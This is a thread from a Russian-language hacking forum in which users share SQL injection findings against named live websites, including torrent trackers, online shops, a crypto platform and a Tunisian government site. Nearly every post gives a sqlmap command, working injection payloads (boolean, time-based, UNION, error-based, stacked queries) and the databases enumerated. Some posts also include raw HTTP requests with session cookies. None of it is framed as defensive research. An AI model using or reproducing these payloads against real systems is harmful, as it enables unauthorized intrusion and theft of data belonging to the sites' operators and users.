• XSS.stack #1 – первый литературный журнал от юзеров форума

Найденные интересеные SQL inj & XSS

Отслеживать
Пожалуйста, обратите внимание, что пользователь заблокирован
Продолжим тему торрент-трекеров. На этот раз "приватный" ресурс.
Скрытый контент для зарегистрированных пользователей.
Код: 
sqlmap.py -u "https://softpilot.win/ajax.php" --data="action=user_register&form_token=&mode=check_invat&user_invat=-1'%20OR%203*2*1=6%20AND%20000272=000272%20--%20"  --random-agent --risk=3 --level=5  -dbms=mysql -dbs
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: HAVING boolean-based blind - WHERE, GROUP BY clause
    Payload: action=user_register&form_token=&mode=check_invat&user_invat=-1' OR 3 HAVING 9783=9783-- Efjw21=6 AND 000272=000272 --

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=user_register&form_token=&mode=check_invat&user_invat=-1' OR 3 AND (SELECT 5661 FROM (SELECT(SLEEP(5)))IxYx)-- tNvv21=6 AND 000272=000272 --
---
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.16
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[INFO] fetching database names
[INFO] fetching number of databases
[INFO] resumed: 3
INFO] resumed: information_schema
[INFO] resumed: test
[INFO] resumed: torrnada_club
available databases [3]:
[*] information_schema
[*] test
[*] torrnada_club
 
Shop
Код: 
sqlmap -u "https://www.xtooleshop.com/ajax/pro_match_choose.asp?ChosenProIDs=1" -p ChosenProIDs --dbms=mssql --technique=S --random-agent --threads=10
---
Parameter: ChosenProIDs (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ChosenProIDs=1);WAITFOR DELAY '0:0:5'--
---
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] dbq_XTOOLeShop_com
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Скрытый контент для зарегистрированных пользователей.
sqlmap -u "https://100shin.ua/modules/orinoko_stores/orinoko_storesCallList.php" --data="allStoresList=1&city=%D0%96%D0%B8%D1%82%D0%BE%D0%BC%D0%B8%D1%80&id_lang=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z" --random-agent --level=5 --risk=3 --dbms=mysql

---
Parameter: id_lang (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: allStoresList=1&city=%D0%96%D0%B8%D1%82%D0%BE%D0%BC%D0%B8%D1%80&id_lang=-3396' OR 5658=5658-- ivQj

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: allStoresList=1&city=%D0%96%D0%B8%D1%82%D0%BE%D0%BC%D0%B8%D1%80&id_lang=0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' OR SLEEP(5)-- LBIx
 
Веб-сайт правительства Туниса заражен уязвимостями
Tunisian goverment website infect with vulnerabilities


Target IP: 196.203.190.19
+ Target Hostname: www.inscription.tn
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /CN=*.inscription.tn
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=Sectigo Limited/CN=Sectigo RSA Domain Validation Secure Server CA
+ Message: Multiple IP addresses found: 196.203.190.19, 196.203.190.20, 196.203.190.21, 196.203.190.22, 196.203.190.18
+ Start Time: 2021-08-27 09:30:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Red Hat)
+ Server may leak inodes via ETags, header found with file /, inode: 10360516, size: 7639, mtime: Fri Sep 6 12:58:17 2019
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server is using a wildcard certificate: *.inscription.tn
 
Desoxyn сказал(а):
Ахххаха, в голосину ... с коллегой щас поржали :D Просто не знаю куда это закинуть
кто то решил мегаплатежку мутить (домен то кстати хорош)
what ?
 
sqlmap --random-agent --level=5 --risk=3 --dbms=mysql -u 'http://www.immefconcept.com.br/banner.php?codBanner=2'

Parameter: codBanner (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: codBanner=2' RLIKE (SELECT (CASE WHEN (4895=4895) THEN 2 ELSE 0x28 END)) AND 'XxQv'='XxQv

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: codBanner=2' AND (SELECT 1628 FROM(SELECT COUNT(*),CONCAT(0x716b716a71,(SELECT (ELT(1628=1628,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mLyY'='mLyY
 
Пожалуйста, обратите внимание, что пользователь заблокирован
www.lillion.io

POST /dapp/forgetpass.php HTTP/1.1
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.lillion.io/
Cookie: PHPSESSID=112d2dbec54385b4e6c9a6daf9e596e6
Host: www.lillion.io
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

send_otp=&regNo=-1'%20OR%203*2*1%3d6%20AND%20000660%3d000660%20--%20

Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: send_otp=&regNo=-1795' OR 9369=9369-- xGbd

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: send_otp=&regNo=1' AND (SELECT 2624 FROM (SELECT(SLEEP(5)))uviD)-- wnMo
---
[17:05:41] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.21.4
back-end DBMS: MySQL >= 5.0.12
[17:05:41] [INFO] fetching database names
[17:05:41] [INFO] resumed: lillioni_db
available databases [2]:
[*] information_schema
[*] lillioni_db

токен торгуется,мне не интересен сайт
 
 
Пожалуйста, обратите внимание, что пользователь заблокирован

GET /news.php?dt=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://eliot-pro.space/
Cookie: PHPSESSID=8852aa508d2492ea2f1b2baf864d21b9; ref_sess_un=Emilsaj; autoref=1; _ym_uid=1645379580962799975; _ym_d=1645537138; _ym_isad=2; _ym_visorc=w
Host: eliot-pro.space
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Parameter: dt (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dt=-6061" OR 6317=6317-- IQVQ

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: dt=1";SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: dt=1" OR (SELECT 1619 FROM (SELECT(SLEEP(5)))XVeh)-- tUQH

Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: dt=1" UNION ALL SELECT NULL,CONCAT(0x7170716271,0x6c4c616c416547696c4f636f527545644b6759695459767a786b7676754543775a4c5768596b4f5a,0x7178787871),NULL,NULL,NULL,NULL,NULL-- -
---
[05:43:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.1.33
back-end DBMS: MySQL >= 5.0.12
[05:43:19] [INFO] fetching database names
available databases [2]:
[*] andrey27_rbt
[*] information_schema
 
Код: 
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: https://garantstore.ru:443/search?search=the" UNION ALL SELECT NULL,CONCAT(0x7171706b71,0x5062546b6a476654585342697278656b6d6a486d5a774b59506e7077506745587576516a4172426a,0x71766a7071),NULL,NULL,NULL,NULL,NULL-- -
    
    available databases [11]:
[*] admin_garantstore
[*] admin_mega_blitz
[*] admin_shop_warthunder
[*] admin_skinscsgoru
[*] admin_tanki_shop
[*] admin_wargaming_su
[*] admin_warthunder_com_ru
[*] admin_wgblitz
[*] admin_wgprem
[*] admin_wot_lot_ru
[*] information_schema
 
Код: 
 Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://hyip-monitor.fr:443/get_rcb_datas.php?id=25' OR (SELECT 3035 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(3035=3035,1))),0x7176766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wkyH

available databases [2]:
[*] hyip_monitor_fr
[*] information_schema
 
Код: 
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: https://islamicstore.ru:443/?_=1645024590106&action=add&ajax=1&controller=products-comparison&id_product=-8031") OR 3665=3665 AND ("BkRS"="BkRS

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://islamicstore.ru:443/?_=1645024590106&action=add&ajax=1&controller=products-comparison&id_product=2930") AND (SELECT 1686 FROM (SELECT(SLEEP(10)))pSGF) AND ("yRRB"="yRRB
---
available databases [2]:
[*] admin_BKpWGJXYLV
[*] information_schema
 
Duble сказал(а):
Код: 
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: https://garantstore.ru:443/search?search=the" UNION ALL SELECT NULL,CONCAT(0x7171706b71,0x5062546b6a476654585342697278656b6d6a486d5a774b59506e7077506745587576516a4172426a,0x71766a7071),NULL,NULL,NULL,NULL,NULL-- -
   
    available databases [11]:
[*] admin_garantstore
[*] admin_mega_blitz
[*] admin_shop_warthunder
[*] admin_skinscsgoru
[*] admin_tanki_shop
[*] admin_wargaming_su
[*] admin_warthunder_com_ru
[*] admin_wgblitz
[*] admin_wgprem
[*] admin_wot_lot_ru
[*] information_schema
Интересно!
Спасибо большое)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх